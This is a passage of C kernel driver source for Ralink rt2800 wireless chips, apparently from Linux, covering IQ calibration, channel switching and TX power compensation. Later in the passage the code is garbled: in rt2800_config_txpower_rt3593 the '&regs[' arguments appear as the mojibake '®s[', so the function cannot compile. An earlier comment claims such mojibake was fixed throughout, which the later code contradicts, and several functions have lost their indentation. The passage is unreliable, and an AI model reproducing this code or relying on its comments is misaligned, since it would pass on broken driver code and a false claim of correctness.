	cal = rt2800_iq_cal_eeprom_byte(rt2x00dev, channel,
				EEPROM_IQ_GAIN_CAL_TX0_2G,
				EEPROM_IQ_GAIN_CAL_TX0_CH36_TO_CH64_5G,
				EEPROM_IQ_GAIN_CAL_TX0_CH100_TO_CH138_5G,
				EEPROM_IQ_GAIN_CAL_TX0_CH140_TO_CH165_5G);
	rt2800_bbp_write(rt2x00dev, 159, cal);

	/* TX0 IQ Phase */
	rt2800_bbp_write(rt2x00dev, 158, 0x2d);
	cal = rt2800_iq_cal_eeprom_byte(rt2x00dev, channel,
				EEPROM_IQ_PHASE_CAL_TX0_2G,
				EEPROM_IQ_PHASE_CAL_TX0_CH36_TO_CH64_5G,
				EEPROM_IQ_PHASE_CAL_TX0_CH100_TO_CH138_5G,
				EEPROM_IQ_PHASE_CAL_TX0_CH140_TO_CH165_5G);
	rt2800_bbp_write(rt2x00dev, 159, cal);

	/* TX1 IQ Gain */
	rt2800_bbp_write(rt2x00dev, 158, 0x4a);
	cal = rt2800_iq_cal_eeprom_byte(rt2x00dev, channel,
				EEPROM_IQ_GAIN_CAL_TX1_2G,
				EEPROM_IQ_GAIN_CAL_TX1_CH36_TO_CH64_5G,
				EEPROM_IQ_GAIN_CAL_TX1_CH100_TO_CH138_5G,
				EEPROM_IQ_GAIN_CAL_TX1_CH140_TO_CH165_5G);
	rt2800_bbp_write(rt2x00dev, 159, cal);

	/* TX1 IQ Phase */
	rt2800_bbp_write(rt2x00dev, 158, 0x4b);
	cal = rt2800_iq_cal_eeprom_byte(rt2x00dev, channel,
				EEPROM_IQ_PHASE_CAL_TX1_2G,
				EEPROM_IQ_PHASE_CAL_TX1_CH36_TO_CH64_5G,
				EEPROM_IQ_PHASE_CAL_TX1_CH100_TO_CH138_5G,
				EEPROM_IQ_PHASE_CAL_TX1_CH140_TO_CH165_5G);
	rt2800_bbp_write(rt2x00dev, 159, cal);

	/* FIXME: possible RX0, RX1 calibration ? */

	/* RF IQ compensation control; 0xff means "not calibrated". */
	rt2800_bbp_write(rt2x00dev, 158, 0x04);
	cal = rt2x00_eeprom_byte(rt2x00dev, EEPROM_RF_IQ_COMPENSATION_CONTROL);
	rt2800_bbp_write(rt2x00dev, 159, cal != 0xff ? cal : 0);

	/* RF IQ imbalance compensation control */
	rt2800_bbp_write(rt2x00dev, 158, 0x03);
	cal = rt2x00_eeprom_byte(rt2x00dev,
				 EEPROM_RF_IQ_IMBALANCE_COMPENSATION_CONTROL);
	rt2800_bbp_write(rt2x00dev, 159, cal != 0xff ? cal : 0);
}
static char rt2800_txpower_to_dev(struct rt2x00_dev *rt2x00dev,
unsigned int channel,
char txpower)
{
if (rt2x00_rt(rt2x00dev, RT3593))
txpower = rt2x00_get_field8(txpower, EEPROM_TXPOWER_ALC);
if (channel <= 14)
return clamp_t(char, txpower, MIN_G_TXPOWER, MAX_G_TXPOWER);
if (rt2x00_rt(rt2x00dev, RT3593))
return clamp_t(char, txpower, MIN_A_TXPOWER_3593,
MAX_A_TXPOWER_3593);
else
return clamp_t(char, txpower, MIN_A_TXPOWER, MAX_A_TXPOWER);
}
/*
 * Top-level channel switch: converts the EEPROM TX power values, calls
 * the RF-chip specific programming routine, then applies the common
 * band/bandwidth dependent BBP, TX_BAND_CFG, TX_PIN_CFG and GPIO
 * settings, runs chip-specific AGC/IQ initialization, and finally
 * clears the channel statistics counters and the RT3352 update flag.
 *
 * Fix vs. the previous revision: all mojibake "&reg" arguments to the
 * register read and set_field32 helpers are restored.
 */
static void rt2800_config_channel(struct rt2x00_dev *rt2x00dev,
				  struct ieee80211_conf *conf,
				  struct rf_channel *rf,
				  struct channel_info *info)
{
	u32 reg;
	unsigned int tx_pin;
	u8 bbp, rfcsr;

	info->default_power1 = rt2800_txpower_to_dev(rt2x00dev, rf->channel,
						     info->default_power1);
	info->default_power2 = rt2800_txpower_to_dev(rt2x00dev, rf->channel,
						     info->default_power2);
	if (rt2x00dev->default_ant.tx_chain_num > 2)
		info->default_power3 =
			rt2800_txpower_to_dev(rt2x00dev, rf->channel,
					      info->default_power3);

	/* Dispatch to the RF-chip specific channel programming. */
	switch (rt2x00dev->chip.rf) {
	case RF2020:
	case RF3020:
	case RF3021:
	case RF3022:
	case RF3320:
		rt2800_config_channel_rf3xxx(rt2x00dev, conf, rf, info);
		break;
	case RF3052:
		rt2800_config_channel_rf3052(rt2x00dev, conf, rf, info);
		break;
	case RF3053:
		rt2800_config_channel_rf3053(rt2x00dev, conf, rf, info);
		break;
	case RF3290:
		rt2800_config_channel_rf3290(rt2x00dev, conf, rf, info);
		break;
	case RF3322:
		rt2800_config_channel_rf3322(rt2x00dev, conf, rf, info);
		break;
	case RF3070:
	case RF5360:
	case RF5362:
	case RF5370:
	case RF5372:
	case RF5390:
	case RF5392:
		rt2800_config_channel_rf53xx(rt2x00dev, conf, rf, info);
		break;
	case RF5592:
		rt2800_config_channel_rf55xx(rt2x00dev, conf, rf, info);
		break;
	default:
		rt2800_config_channel_rf2xxx(rt2x00dev, conf, rf, info);
	}

	/* Single-band chips: force 20MHz filters and kick VCO calibration. */
	if (rt2x00_rf(rt2x00dev, RF3070) ||
	    rt2x00_rf(rt2x00dev, RF3290) ||
	    rt2x00_rf(rt2x00dev, RF3322) ||
	    rt2x00_rf(rt2x00dev, RF5360) ||
	    rt2x00_rf(rt2x00dev, RF5362) ||
	    rt2x00_rf(rt2x00dev, RF5370) ||
	    rt2x00_rf(rt2x00dev, RF5372) ||
	    rt2x00_rf(rt2x00dev, RF5390) ||
	    rt2x00_rf(rt2x00dev, RF5392)) {
		rt2800_rfcsr_read(rt2x00dev, 30, &rfcsr);
		rt2x00_set_field8(&rfcsr, RFCSR30_TX_H20M, 0);
		rt2x00_set_field8(&rfcsr, RFCSR30_RX_H20M, 0);
		rt2800_rfcsr_write(rt2x00dev, 30, rfcsr);

		rt2800_rfcsr_read(rt2x00dev, 3, &rfcsr);
		rt2x00_set_field8(&rfcsr, RFCSR3_VCOCAL_EN, 1);
		rt2800_rfcsr_write(rt2x00dev, 3, rfcsr);
	}

	/*
	 * Change BBP settings
	 */
	if (rt2x00_rt(rt2x00dev, RT3352)) {
		rt2800_bbp_write(rt2x00dev, 27, 0x0);
		rt2800_bbp_write(rt2x00dev, 66, 0x26 + rt2x00dev->lna_gain);
		rt2800_bbp_write(rt2x00dev, 27, 0x20);
		rt2800_bbp_write(rt2x00dev, 66, 0x26 + rt2x00dev->lna_gain);
	} else if (rt2x00_rt(rt2x00dev, RT3593)) {
		if (rf->channel > 14) {
			/* Disable CCK Packet detection on 5GHz */
			rt2800_bbp_write(rt2x00dev, 70, 0x00);
		} else {
			rt2800_bbp_write(rt2x00dev, 70, 0x0a);
		}

		if (conf_is_ht40(conf))
			rt2800_bbp_write(rt2x00dev, 105, 0x04);
		else
			rt2800_bbp_write(rt2x00dev, 105, 0x34);

		rt2800_bbp_write(rt2x00dev, 62, 0x37 - rt2x00dev->lna_gain);
		rt2800_bbp_write(rt2x00dev, 63, 0x37 - rt2x00dev->lna_gain);
		rt2800_bbp_write(rt2x00dev, 64, 0x37 - rt2x00dev->lna_gain);
		rt2800_bbp_write(rt2x00dev, 77, 0x98);
	} else {
		rt2800_bbp_write(rt2x00dev, 62, 0x37 - rt2x00dev->lna_gain);
		rt2800_bbp_write(rt2x00dev, 63, 0x37 - rt2x00dev->lna_gain);
		rt2800_bbp_write(rt2x00dev, 64, 0x37 - rt2x00dev->lna_gain);
		rt2800_bbp_write(rt2x00dev, 86, 0);
	}

	if (rf->channel <= 14) {
		if (!rt2x00_rt(rt2x00dev, RT5390) &&
		    !rt2x00_rt(rt2x00dev, RT5392)) {
			if (rt2x00_has_cap_external_lna_bg(rt2x00dev)) {
				rt2800_bbp_write(rt2x00dev, 82, 0x62);
				rt2800_bbp_write(rt2x00dev, 75, 0x46);
			} else {
				if (rt2x00_rt(rt2x00dev, RT3593))
					rt2800_bbp_write(rt2x00dev, 82, 0x62);
				else
					rt2800_bbp_write(rt2x00dev, 82, 0x84);
				rt2800_bbp_write(rt2x00dev, 75, 0x50);
			}
			if (rt2x00_rt(rt2x00dev, RT3593))
				rt2800_bbp_write(rt2x00dev, 83, 0x8a);
		}

	} else {
		if (rt2x00_rt(rt2x00dev, RT3572))
			rt2800_bbp_write(rt2x00dev, 82, 0x94);
		else if (rt2x00_rt(rt2x00dev, RT3593))
			rt2800_bbp_write(rt2x00dev, 82, 0x82);
		else
			rt2800_bbp_write(rt2x00dev, 82, 0xf2);

		if (rt2x00_rt(rt2x00dev, RT3593))
			rt2800_bbp_write(rt2x00dev, 83, 0x9a);

		if (rt2x00_has_cap_external_lna_a(rt2x00dev))
			rt2800_bbp_write(rt2x00dev, 75, 0x46);
		else
			rt2800_bbp_write(rt2x00dev, 75, 0x50);
	}

	rt2800_register_read(rt2x00dev, TX_BAND_CFG, &reg);
	rt2x00_set_field32(&reg, TX_BAND_CFG_HT40_MINUS, conf_is_ht40_minus(conf));
	rt2x00_set_field32(&reg, TX_BAND_CFG_A, rf->channel > 14);
	rt2x00_set_field32(&reg, TX_BAND_CFG_BG, rf->channel <= 14);
	rt2800_register_write(rt2x00dev, TX_BAND_CFG, reg);

	if (rt2x00_rt(rt2x00dev, RT3572))
		rt2800_rfcsr_write(rt2x00dev, 8, 0);

	/* Enable the PAs for the TX chains of the active band... */
	tx_pin = 0;
	switch (rt2x00dev->default_ant.tx_chain_num) {
	case 3:
		/* Turn on tertiary PAs */
		rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_A2_EN,
				   rf->channel > 14);
		rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G2_EN,
				   rf->channel <= 14);
		/* fall-through */
	case 2:
		/* Turn on secondary PAs */
		rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_A1_EN,
				   rf->channel > 14);
		rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G1_EN,
				   rf->channel <= 14);
		/* fall-through */
	case 1:
		/* Turn on primary PAs */
		rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_A0_EN,
				   rf->channel > 14);
		if (rt2x00_has_cap_bt_coexist(rt2x00dev))
			rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G0_EN, 1);
		else
			rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G0_EN,
					   rf->channel <= 14);
		break;
	}

	/* ...and the LNAs for the RX chains (both bands). */
	switch (rt2x00dev->default_ant.rx_chain_num) {
	case 3:
		/* Turn on tertiary LNAs */
		rt2x00_set_field32(&tx_pin, TX_PIN_CFG_LNA_PE_A2_EN, 1);
		rt2x00_set_field32(&tx_pin, TX_PIN_CFG_LNA_PE_G2_EN, 1);
		/* fall-through */
	case 2:
		/* Turn on secondary LNAs */
		rt2x00_set_field32(&tx_pin, TX_PIN_CFG_LNA_PE_A1_EN, 1);
		rt2x00_set_field32(&tx_pin, TX_PIN_CFG_LNA_PE_G1_EN, 1);
		/* fall-through */
	case 1:
		/* Turn on primary LNAs */
		rt2x00_set_field32(&tx_pin, TX_PIN_CFG_LNA_PE_A0_EN, 1);
		rt2x00_set_field32(&tx_pin, TX_PIN_CFG_LNA_PE_G0_EN, 1);
		break;
	}

	rt2x00_set_field32(&tx_pin, TX_PIN_CFG_RFTR_EN, 1);
	rt2x00_set_field32(&tx_pin, TX_PIN_CFG_TRSW_EN, 1);

	rt2800_register_write(rt2x00dev, TX_PIN_CFG, tx_pin);

	if (rt2x00_rt(rt2x00dev, RT3572)) {
		rt2800_rfcsr_write(rt2x00dev, 8, 0x80);

		/* AGC init */
		if (rf->channel <= 14)
			reg = 0x1c + (2 * rt2x00dev->lna_gain);
		else
			reg = 0x22 + ((rt2x00dev->lna_gain * 5) / 3);

		rt2800_bbp_write_with_rx_chain(rt2x00dev, 66, reg);
	}

	if (rt2x00_rt(rt2x00dev, RT3593)) {
		rt2800_register_read(rt2x00dev, GPIO_CTRL, &reg);

		/* Band selection */
		if (rt2x00_is_usb(rt2x00dev) ||
		    rt2x00_is_pcie(rt2x00dev)) {
			/* GPIO #8 controls all paths */
			rt2x00_set_field32(&reg, GPIO_CTRL_DIR8, 0);
			if (rf->channel <= 14)
				rt2x00_set_field32(&reg, GPIO_CTRL_VAL8, 1);
			else
				rt2x00_set_field32(&reg, GPIO_CTRL_VAL8, 0);
		}

		/* LNA PE control. */
		if (rt2x00_is_usb(rt2x00dev)) {
			/* GPIO #4 controls PE0 and PE1,
			 * GPIO #7 controls PE2
			 */
			rt2x00_set_field32(&reg, GPIO_CTRL_DIR4, 0);
			rt2x00_set_field32(&reg, GPIO_CTRL_DIR7, 0);

			rt2x00_set_field32(&reg, GPIO_CTRL_VAL4, 1);
			rt2x00_set_field32(&reg, GPIO_CTRL_VAL7, 1);
		} else if (rt2x00_is_pcie(rt2x00dev)) {
			/* GPIO #4 controls PE0, PE1 and PE2 */
			rt2x00_set_field32(&reg, GPIO_CTRL_DIR4, 0);
			rt2x00_set_field32(&reg, GPIO_CTRL_VAL4, 1);
		}

		rt2800_register_write(rt2x00dev, GPIO_CTRL, reg);

		/* AGC init */
		if (rf->channel <= 14)
			reg = 0x1c + 2 * rt2x00dev->lna_gain;
		else
			reg = 0x22 + ((rt2x00dev->lna_gain * 5) / 3);

		rt2800_bbp_write_with_rx_chain(rt2x00dev, 66, reg);

		usleep_range(1000, 1500);
	}

	if (rt2x00_rt(rt2x00dev, RT5592)) {
		rt2800_bbp_write(rt2x00dev, 195, 141);
		rt2800_bbp_write(rt2x00dev, 196, conf_is_ht40(conf) ? 0x10 : 0x1a);

		/* AGC init */
		reg = (rf->channel <= 14 ? 0x1c : 0x24) + 2 * rt2x00dev->lna_gain;
		rt2800_bbp_write_with_rx_chain(rt2x00dev, 66, reg);

		rt2800_iq_calibrate(rt2x00dev, rf->channel);
	}

	rt2800_bbp_read(rt2x00dev, 4, &bbp);
	rt2x00_set_field8(&bbp, BBP4_BANDWIDTH, 2 * conf_is_ht40(conf));
	rt2800_bbp_write(rt2x00dev, 4, bbp);

	rt2800_bbp_read(rt2x00dev, 3, &bbp);
	rt2x00_set_field8(&bbp, BBP3_HT40_MINUS, conf_is_ht40_minus(conf));
	rt2800_bbp_write(rt2x00dev, 3, bbp);

	if (rt2x00_rt_rev(rt2x00dev, RT2860, REV_RT2860C)) {
		if (conf_is_ht40(conf)) {
			rt2800_bbp_write(rt2x00dev, 69, 0x1a);
			rt2800_bbp_write(rt2x00dev, 70, 0x0a);
			rt2800_bbp_write(rt2x00dev, 73, 0x16);
		} else {
			rt2800_bbp_write(rt2x00dev, 69, 0x16);
			rt2800_bbp_write(rt2x00dev, 70, 0x08);
			rt2800_bbp_write(rt2x00dev, 73, 0x11);
		}
	}

	msleep(1);

	/*
	 * Clear channel statistic counters
	 */
	rt2800_register_read(rt2x00dev, CH_IDLE_STA, &reg);
	rt2800_register_read(rt2x00dev, CH_BUSY_STA, &reg);
	rt2800_register_read(rt2x00dev, CH_BUSY_STA_SEC, &reg);

	/*
	 * Clear update flag
	 */
	if (rt2x00_rt(rt2x00dev, RT3352)) {
		rt2800_bbp_read(rt2x00dev, 49, &bbp);
		rt2x00_set_field8(&bbp, BBP49_UPDATE_FLAG, 0);
		rt2800_bbp_write(rt2x00dev, 49, bbp);
	}
}
/*
 * Compute a TX power delta (in AGC steps) for temperature compensation.
 *
 * The delta is derived by comparing the current TSSI (Transmitter Signal
 * Strength Indication, read from BBP register 49) against nine per-band
 * TSSI boundary values stored in the EEPROM.
 *
 * Returns 0 when temperature compensation is unsupported or the EEPROM
 * data is invalid, otherwise (i - 4) * step for boundary index i, i.e. a
 * value in the range [-4 * step, +4 * step].
 */
static int rt2800_get_gain_calibration_delta(struct rt2x00_dev *rt2x00dev)
{
	u8 tssi_bounds[9];
	u8 current_tssi;
	u16 eeprom;
	u8 step;
	int i;

	/*
	 * First check if temperature compensation is supported.
	 */
	rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1, &eeprom);
	if (!rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_EXTERNAL_TX_ALC))
		return 0;

	/*
	 * Read TSSI boundaries for temperature compensation from
	 * the EEPROM.
	 *
	 * Array idx               0    1    2    3    4    5    6    7    8
	 * Matching Delta value   -4   -3   -2   -1    0   +1   +2   +3   +4
	 * Example TSSI bounds  0xF0 0xD0 0xB5 0xA0 0x88 0x45 0x25 0x15 0x00
	 */
	if (rt2x00dev->curr_band == IEEE80211_BAND_2GHZ) {
		rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_BG1, &eeprom);
		tssi_bounds[0] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_BG1_MINUS4);
		tssi_bounds[1] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_BG1_MINUS3);

		rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_BG2, &eeprom);
		tssi_bounds[2] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_BG2_MINUS2);
		tssi_bounds[3] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_BG2_MINUS1);

		rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_BG3, &eeprom);
		tssi_bounds[4] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_BG3_REF);
		tssi_bounds[5] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_BG3_PLUS1);

		rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_BG4, &eeprom);
		tssi_bounds[6] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_BG4_PLUS2);
		tssi_bounds[7] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_BG4_PLUS3);

		rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_BG5, &eeprom);
		tssi_bounds[8] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_BG5_PLUS4);

		step = rt2x00_get_field16(eeprom,
					  EEPROM_TSSI_BOUND_BG5_AGC_STEP);
	} else {
		rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_A1, &eeprom);
		tssi_bounds[0] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_A1_MINUS4);
		tssi_bounds[1] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_A1_MINUS3);

		rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_A2, &eeprom);
		tssi_bounds[2] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_A2_MINUS2);
		tssi_bounds[3] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_A2_MINUS1);

		rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_A3, &eeprom);
		tssi_bounds[4] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_A3_REF);
		tssi_bounds[5] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_A3_PLUS1);

		rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_A4, &eeprom);
		tssi_bounds[6] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_A4_PLUS2);
		tssi_bounds[7] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_A4_PLUS3);

		rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_A5, &eeprom);
		tssi_bounds[8] = rt2x00_get_field16(eeprom,
					EEPROM_TSSI_BOUND_A5_PLUS4);

		step = rt2x00_get_field16(eeprom,
					  EEPROM_TSSI_BOUND_A5_AGC_STEP);
	}

	/*
	 * Check if temperature compensation is supported.
	 * A 0xff reference bound or step means the EEPROM field is unset.
	 */
	if (tssi_bounds[4] == 0xff || step == 0xff)
		return 0;

	/*
	 * Read current TSSI (BBP 49).
	 */
	rt2800_bbp_read(rt2x00dev, 49, &current_tssi);

	/*
	 * Compare TSSI value (BBP49) with the compensation boundaries
	 * from the EEPROM and increase or decrease tx power.
	 * Bounds 0..3 are descending (negative deltas), 5..8 ascending
	 * (positive deltas); index 4 is the reference (delta 0).
	 */
	for (i = 0; i <= 3; i++) {
		if (current_tssi > tssi_bounds[i])
			break;
	}

	if (i == 4) {
		for (i = 8; i >= 5; i--) {
			if (current_tssi < tssi_bounds[i])
				break;
		}
	}

	return (i - 4) * step;
}
/*
 * Return the HT40 bandwidth TX power compensation value for the given
 * band, as configured in the EEPROM_TXPOWER_DELTA word. Returns 0 when
 * not operating on a HT40 channel, when the EEPROM word is unset
 * (0xffff), or when compensation is disabled for the band.
 */
static int rt2800_get_txpower_bw_comp(struct rt2x00_dev *rt2x00dev,
				      enum ieee80211_band band)
{
	u16 eeprom;
	u8 enabled;
	u8 type;
	int value;

	rt2800_eeprom_read(rt2x00dev, EEPROM_TXPOWER_DELTA, &eeprom);

	/*
	 * HT40 compensation not required.
	 */
	if (eeprom == 0xffff ||
	    !test_bit(CONFIG_CHANNEL_HT40, &rt2x00dev->flags))
		return 0;

	if (band == IEEE80211_BAND_2GHZ) {
		enabled = rt2x00_get_field16(eeprom,
					     EEPROM_TXPOWER_DELTA_ENABLE_2G);
		if (!enabled)
			return 0;
		type = rt2x00_get_field16(eeprom,
					  EEPROM_TXPOWER_DELTA_TYPE_2G);
		value = rt2x00_get_field16(eeprom,
					   EEPROM_TXPOWER_DELTA_VALUE_2G);
	} else {
		enabled = rt2x00_get_field16(eeprom,
					     EEPROM_TXPOWER_DELTA_ENABLE_5G);
		if (!enabled)
			return 0;
		type = rt2x00_get_field16(eeprom,
					  EEPROM_TXPOWER_DELTA_TYPE_5G);
		value = rt2x00_get_field16(eeprom,
					   EEPROM_TXPOWER_DELTA_VALUE_5G);
	}

	/* A zero type means the delta has to be subtracted. */
	return type ? value : -value;
}
/*
 * Return a (non-positive) TX power delta used to honour a user-requested
 * power_level below the regulatory maximum, on devices without a known
 * hardware power limit. Devices with CAPABILITY_POWER_LIMIT handle the
 * user setting in rt2800_compensate_txpower() instead and get 0 here.
 */
static int rt2800_get_txpower_reg_delta(struct rt2x00_dev *rt2x00dev,
					int power_level, int max_power)
{
	if (rt2x00_has_cap_power_limit(rt2x00dev))
		return 0;

	/*
	 * XXX: We don't know the maximum transmit power of our hardware since
	 * the EEPROM doesn't expose it. We only know that we are calibrated
	 * to 100% tx power.
	 *
	 * Hence, we assume the regulatory limit that cfg80211 calulated for
	 * the current channel is our maximum and if we are requested to lower
	 * the value we just reduce our tx power accordingly.
	 */
	if (power_level >= max_power)
		return 0;

	return power_level - max_power;
}
/*
 * Apply the accumulated compensation delta to a per-rate EEPROM txpower
 * value and clamp the result to the valid register range [0, 0xc].
 * On devices with CAPABILITY_POWER_LIMIT the EIRP txpower is additionally
 * capped so it does not exceed the requested power_level.
 */
static u8 rt2800_compensate_txpower(struct rt2x00_dev *rt2x00dev, int is_rate_b,
				    enum ieee80211_band band, int power_level,
				    u8 txpower, int delta)
{
	u16 eeprom;
	u8 ref_byrate;
	u8 eirp_txpower;
	u8 eirp_ref;
	u8 reg_limit = 0;

	if (rt2x00_rt(rt2x00dev, RT3593))
		return min_t(u8, txpower, 0xc);

	if (rt2x00_has_cap_power_limit(rt2x00dev)) {
		/*
		 * Check if eirp txpower exceed txpower_limit.
		 * We use OFDM 6M as criterion and its eirp txpower
		 * is stored at EEPROM_EIRP_MAX_TX_POWER.
		 * .11b data rate need add additional 4dbm
		 * when calculating eirp txpower.
		 */
		rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
					      1, &eeprom);
		ref_byrate = rt2x00_get_field16(eeprom,
						EEPROM_TXPOWER_BYRATE_RATE0);

		rt2800_eeprom_read(rt2x00dev, EEPROM_EIRP_MAX_TX_POWER,
				   &eeprom);
		if (band == IEEE80211_BAND_2GHZ)
			eirp_ref = rt2x00_get_field16(eeprom,
					EEPROM_EIRP_MAX_TX_POWER_2GHZ);
		else
			eirp_ref = rt2x00_get_field16(eeprom,
					EEPROM_EIRP_MAX_TX_POWER_5GHZ);

		eirp_txpower = eirp_ref + (txpower - ref_byrate) +
			       (is_rate_b ? 4 : 0) + delta;

		if (eirp_txpower > power_level)
			reg_limit = eirp_txpower - power_level;
	}

	txpower = max(0, txpower + delta - reg_limit);
	return min_t(u8, txpower, 0xc);
}
/*
 * Indices into the local regs[] scratch array used by
 * rt2800_config_txpower_rt3593(); one slot per TX_PWR_CFG_* MAC
 * register (including the *_EXT registers carrying the third-chain
 * fields). TX_PWR_CFG_IDX_COUNT sizes the array.
 */
enum {
	TX_PWR_CFG_0_IDX,
	TX_PWR_CFG_1_IDX,
	TX_PWR_CFG_2_IDX,
	TX_PWR_CFG_3_IDX,
	TX_PWR_CFG_4_IDX,
	TX_PWR_CFG_5_IDX,
	TX_PWR_CFG_6_IDX,
	TX_PWR_CFG_7_IDX,
	TX_PWR_CFG_8_IDX,
	TX_PWR_CFG_9_IDX,
	TX_PWR_CFG_0_EXT_IDX,
	TX_PWR_CFG_1_EXT_IDX,
	TX_PWR_CFG_2_EXT_IDX,
	TX_PWR_CFG_3_EXT_IDX,
	TX_PWR_CFG_4_EXT_IDX,
	TX_PWR_CFG_IDX_COUNT,
};
static void rt2800_config_txpower_rt3593(struct rt2x00_dev *rt2x00dev,
struct ieee80211_channel *chan,
int power_level)
{
u8 txpower;
u16 eeprom;
u32 regs[TX_PWR_CFG_IDX_COUNT];
unsigned int offset;
enum ieee80211_band band = chan->band;
int delta;
int i;
memset(regs, '\0', sizeof(regs));
/* TODO: adapt TX power reduction from the rt28xx code */
/* calculate temperature compensation delta */
delta = rt2800_get_gain_calibration_delta(rt2x00dev);
if (band == IEEE80211_BAND_5GHZ)
offset = 16;
else
offset = 0;
if (test_bit(CONFIG_CHANNEL_HT40, &rt2x00dev->flags))
offset += 8;
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset, &eeprom);
/* CCK 1MBS,2MBS */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 1, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_CCK1_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_CCK1_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_EXT_IDX],
TX_PWR_CFG_0_EXT_CCK1_CH2, txpower);
/* CCK 5.5MBS,11MBS */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 1, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_CCK5_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_CCK5_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_EXT_IDX],
TX_PWR_CFG_0_EXT_CCK5_CH2, txpower);
/* OFDM 6MBS,9MBS */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_OFDM6_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_OFDM6_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_EXT_IDX],
TX_PWR_CFG_0_EXT_OFDM6_CH2, txpower);
/* OFDM 12MBS,18MBS */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE3);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_OFDM12_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_OFDM12_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_EXT_IDX],
TX_PWR_CFG_0_EXT_OFDM12_CH2, txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 1, &eeprom);
/* OFDM 24MBS,36MBS */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_OFDM24_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_OFDM24_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_EXT_IDX],
TX_PWR_CFG_1_EXT_OFDM24_CH2, txpower);
/* OFDM 48MBS */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_OFDM48_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_OFDM48_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_EXT_IDX],
TX_PWR_CFG_1_EXT_OFDM48_CH2, txpower);
/* OFDM 54MBS */
